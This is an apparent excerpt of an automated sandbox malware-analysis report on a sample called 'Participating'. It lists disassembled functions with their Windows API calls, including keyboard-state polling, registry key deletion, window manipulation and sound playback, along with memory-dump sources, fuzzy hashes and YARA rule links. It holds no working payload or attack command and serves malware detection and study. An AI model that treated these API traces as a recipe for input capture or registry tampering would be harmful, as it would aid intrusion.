                                                                                                                                                                                                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00D453EB
                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00D45445
                                                                                                                                                                                                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00D45477
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00D454EF
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
                                                                                                                                                                                                                                                                  • String ID: ThumbnailClass
                                                                                                                                                                                                                                                                  • API String ID: 1311036022-1241985126
                                                                                                                                                                                                                                                                  • Opcode ID: 8ed7cdfac122f2212433ae6704b9dc01010ad51e6461e7ae248136e28245c231
                                                                                                                                                                                                                                                                  • Instruction ID: d2da0c35aa87c7d93183cf8d94660707c54a664ff4025e7c810344acea664038
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8ed7cdfac122f2212433ae6704b9dc01010ad51e6461e7ae248136e28245c231
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91910871104B06AFDB04DF24E894BBAB7B9FF01304F184519FA8A82196EB31ED55CBB1
                                                                                                                                                                                                                                                                  Function 00D7976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00CE24B0
                                                                                                                                                                                                                                                                  • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00D797B6
                                                                                                                                                                                                                                                                  • GetFocus.USER32 ref: 00D797C6
                                                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(00000000), ref: 00D797D1
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00D79879
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00D7992B
                                                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00D79948
                                                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00D79958
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00D7998A
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00D799CC
                                                                                                                                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D799FD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 1026556194-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: fe862c4e3acf8b29a2120b32423735f7e3431c2e01fac2edc078088ad2da2c7b
                                                                                                                                                                                                                                                                  • Instruction ID: d5934e4eea47836c7daebb299d5038a1405551d155644b0d71510fab2a695d56
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe862c4e3acf8b29a2120b32423735f7e3431c2e01fac2edc078088ad2da2c7b
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA819C725083419FD710CF25D895AABBBE9FF89314F08891DF98997291EB30D905CBB2
                                                                                                                                                                                                                                                                  Function 00D4C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(00DB29C0,000000FF,00000000,00000030), ref: 00D4C973
                                                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(00DB29C0,00000004,00000000,00000030), ref: 00D4C9A8
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00D4C9BA
                                                                                                                                                                                                                                                                  • GetMenuItemCount.USER32(?), ref: 00D4CA00
                                                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,00000000), ref: 00D4CA1D
                                                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00D4CA49
                                                                                                                                                                                                                                                                  • GetMenuItemID.USER32(?,?), ref: 00D4CA90
                                                                                                                                                                                                                                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00D4CAD6
                                                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D4CAEB
                                                                                                                                                                                                                                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00D4CB0C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                                                                                                                                                                                                                                  • String ID: 0
                                                                                                                                                                                                                                                                  • API String ID: 1460738036-4108050209
                                                                                                                                                                                                                                                                  • Opcode ID: 00d207e43a173259794316891521ed4f54ea905d8c9095d6d8cb74aa74d79453
                                                                                                                                                                                                                                                                  • Instruction ID: 17de08725c7679843ed2293865b2c9f99c8f46a33a5ed5a47579498b4c979f75
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00d207e43a173259794316891521ed4f54ea905d8c9095d6d8cb74aa74d79453
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6619C71A2224AAFDF51CF64C889AFE7BB9FF05348F081119E955A3291DB34AD40CB70
                                                                                                                                                                                                                                                                  Function 00D4E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00D4E4D4
                                                                                                                                                                                                                                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00D4E4FA
                                                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00D4E504
                                                                                                                                                                                                                                                                  • _wcsstr.LIBVCRUNTIME ref: 00D4E554
                                                                                                                                                                                                                                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00D4E570
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
                                                                                                                                                                                                                                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                                                                                                                                                                  • API String ID: 1939486746-1459072770
                                                                                                                                                                                                                                                                  • Opcode ID: 8655731399a45ca5099085737e276de6db9411d28c46f7165192199ac58347df
                                                                                                                                                                                                                                                                  • Instruction ID: 23c99ad78173cda237b64deb2e333023d963011c1a61d5c1bd53dbb5c7ec61d3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8655731399a45ca5099085737e276de6db9411d28c46f7165192199ac58347df
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF41FF72A002147BEB00AB649C47FBF77ACEF55710F14042AF909E61C2FA699A0196B6
                                                                                                                                                                                                                                                                  Function 00D6D694 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 104registryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00D6D6C4
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?,00000000), ref: 00D6D6ED
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00D6D7A8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D694: RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00D6D70A
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D694: LoadLibraryA.KERNEL32(advapi32.dll,?,?,00000000), ref: 00D6D71D
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D694: GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00D6D72F
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D694: FreeLibrary.KERNEL32(00000000,?,?,00000000), ref: 00D6D765
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D694: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000000), ref: 00D6D788
                                                                                                                                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00D6D753
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
                                                                                                                                                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                  • API String ID: 2734957052-4033151799
                                                                                                                                                                                                                                                                  • Opcode ID: eeee54f58f8ae57bf00e1c6e41922048efc17a1bbb01ac7831edff49eec232e8
                                                                                                                                                                                                                                                                  • Instruction ID: dcddd76e7f6f688c688bb48ed51adcb226635c211dc469fb59981bd54650ac72
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eeee54f58f8ae57bf00e1c6e41922048efc17a1bbb01ac7831edff49eec232e8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A5315071E01229BBD7219F90EC88EEF7B7EEF55750F040165A806E2240EA749E459AB1
                                                                                                                                                                                                                                                                  Function 00D4EFC7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • timeGetTime.WINMM ref: 00D4EFCB
                                                                                                                                                                                                                                                                    • Part of subcall function 00CFF215: timeGetTime.WINMM(?,?,00D4EFEB), ref: 00CFF219
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00D4EFF8
                                                                                                                                                                                                                                                                  • EnumThreadWindows.USER32(?,Function_0006EF7C,00000000), ref: 00D4F01C
                                                                                                                                                                                                                                                                  • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00D4F03E
                                                                                                                                                                                                                                                                  • SetActiveWindow.USER32 ref: 00D4F05D
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00D4F06B
                                                                                                                                                                                                                                                                  • SendMessageW.USER32(00000010,00000000,00000000), ref: 00D4F08A
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000000FA), ref: 00D4F095
                                                                                                                                                                                                                                                                  • IsWindow.USER32 ref: 00D4F0A1
                                                                                                                                                                                                                                                                  • EndDialog.USER32(00000000), ref: 00D4F0B2
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                                                                                                                                                  • String ID: BUTTON
                                                                                                                                                                                                                                                                  • API String ID: 1194449130-3405671355
                                                                                                                                                                                                                                                                  • Opcode ID: 4c798d216900304d624ac40c28913e84d1c12216bbb4b7fc397b8b7dd62055f5
                                                                                                                                                                                                                                                                  • Instruction ID: 8fa12f8f0093e51a1f57cde1929c8b6820451858726953b2178fee342f62a791
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4c798d216900304d624ac40c28913e84d1c12216bbb4b7fc397b8b7dd62055f5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB218E71640304FFE7216F60EC89B267BBAFF89B55B040129F50AC2372EB718D859A71
                                                                                                                                                                                                                                                                  Function 00D4F313 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00D4F374
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00D4F38A
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00D4F39B
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00D4F3AD
                                                                                                                                                                                                                                                                  • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00D4F3BE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: SendString$_wcslen
                                                                                                                                                                                                                                                                  • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                                                                                                                  • API String ID: 2420728520-1007645807
                                                                                                                                                                                                                                                                  • Opcode ID: e8487a49a332a1844c816dccb7bebab2935f367ca5ee01e382e7ce954212e51a
                                                                                                                                                                                                                                                                  • Instruction ID: 683227e8df9d5f6106796022e9a004c705d1e84a5694778d6fe20a45b34829b3
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8487a49a332a1844c816dccb7bebab2935f367ca5ee01e382e7ce954212e51a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01118632A502997ED720A766CC4AEFF7A7CEFD2B40F40042AB401E20E1DAA05D49C9B1
                                                                                                                                                                                                                                                                  Function 00D4A958 Relevance: 18.2, APIs: 12, Instructions: 188keyboardCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00D4A9D9
                                                                                                                                                                                                                                                                  • SetKeyboardState.USER32(?), ref: 00D4AA44
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A0), ref: 00D4AA64
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(000000A0), ref: 00D4AA7B
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(000000A1), ref: 00D4AAAA
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(000000A1), ref: 00D4AABB
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000011), ref: 00D4AAE7
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(00000011), ref: 00D4AAF5
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(00000012), ref: 00D4AB1E
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(00000012), ref: 00D4AB2C
                                                                                                                                                                                                                                                                  • GetAsyncKeyState.USER32(0000005B), ref: 00D4AB55
                                                                                                                                                                                                                                                                  • GetKeyState.USER32(0000005B), ref: 00D4AB63
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: State$Async$Keyboard
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 541375521-0
                                                                                                                                                                                                                                                                  • Opcode ID: 4bd9cbb996e281c29f3153f47ff2814b719adcbf6866adb4e91e17d0154371d4
                                                                                                                                                                                                                                                                  • Instruction ID: 92fcd0418d14501ec0e2d78d21d2ee77af9bc5010a239bba9c58627b0b8bbbed
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bd9cbb996e281c29f3153f47ff2814b719adcbf6866adb4e91e17d0154371d4
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC51E560A447842BFB35D7788851BEABFB59F12380F4C459EC5C25A1C2DA649B8CCB73
                                                                                                                                                                                                                                                                  Function 00D4662D Relevance: 18.2, APIs: 12, Instructions: 173COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000001), ref: 00D46649
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00D46662
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00D466C0
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,00000002), ref: 00D466D0
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00D466E2
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00D46736
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00D46744
                                                                                                                                                                                                                                                                  • GetWindowRect.USER32(00000000,?), ref: 00D46756
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00D46798
                                                                                                                                                                                                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00D467AB
                                                                                                                                                                                                                                                                  • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00D467C1
                                                                                                                                                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00D467CE
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3096461208-0
                                                                                                                                                                                                                                                                  • Opcode ID: e1f5f4059bc9c53ba51e12e8e8a731b7fe66219de3bdd82e88f337ecf27d4bb3
                                                                                                                                                                                                                                                                  • Instruction ID: 2010076494fb5786a1ad2913792900f0ad885d14479872c7b7ccce05db746560
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1f5f4059bc9c53ba51e12e8e8a731b7fe66219de3bdd82e88f337ecf27d4bb3
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 205120B1A00309AFDF18CF68CD85AAE7BB6FF48314F148129F51AE6290D770ED448B60
                                                                                                                                                                                                                                                                  Function 00CE146D Relevance: 18.2, APIs: 12, Instructions: 168timeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE1802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00CE1488,?,00000000,?,?,?,?,00CE145A,00000000,?), ref: 00CE1865
                                                                                                                                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00CE1521
                                                                                                                                                                                                                                                                  • KillTimer.USER32(00000000,?,?,?,?,00CE145A,00000000,?), ref: 00CE15BB
                                                                                                                                                                                                                                                                  • DestroyAcceleratorTable.USER32(00000000), ref: 00D229B4
                                                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00CE145A,00000000,?), ref: 00D229E2
                                                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00CE145A,00000000,?), ref: 00D229F9
                                                                                                                                                                                                                                                                  • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00CE145A,00000000), ref: 00D22A15
                                                                                                                                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00D22A27
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
